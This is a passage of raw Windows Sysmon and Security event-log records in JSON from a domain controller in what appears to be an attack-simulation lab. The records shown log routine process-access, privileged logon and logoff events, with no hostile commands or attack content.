SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4004,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4005,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4006,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4007,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4008,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:55.497\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0283-5F25-0000-001015F50500}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:55.497","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0283-5F25-0000-001015F50500}","TargetProcessId":"5016","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220416,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5F7C6\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x5f7c6","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:50:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220417,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x5F7C6\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54887\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x5f7c6","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54887","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:50:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220418,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5F7C6\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x5f7c6","LogonType":"3","EventReceivedTime":"2020-08-01 05:50:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:12","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220419,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B795\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4b795","LogonType":"3","EventReceivedTime":"2020-08-01 05:50:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4009,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 1660\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nTargetProcessId: 4532\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\wbem\\wmisvc.dll+21c4|c:\\windows\\system32\\wbem\\wmisvc.dll+2031|C:\\Windows\\SYSTEM32\\ntdll.dll+7df1d|C:\\Windows\\SYSTEM32\\ntdll.dll+45ce9|C:\\Windows\\SYSTEM32\\ntdll.dll+29bdf|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:29.896","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"1660","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-02A5-5F25-0000-001050FE0500}","TargetProcessId":"4532","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\wbem\\wmisvc.dll+21c4|c:\\windows\\system32\\wbem\\wmisvc.dll+2031|C:\\Windows\\SYSTEM32\\ntdll.dll+7df1d|C:\\Windows\\SYSTEM32\\ntdll.dll+45ce9|C:\\Windows\\SYSTEM32\\ntdll.dll+29bdf|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4010,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:29.896\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 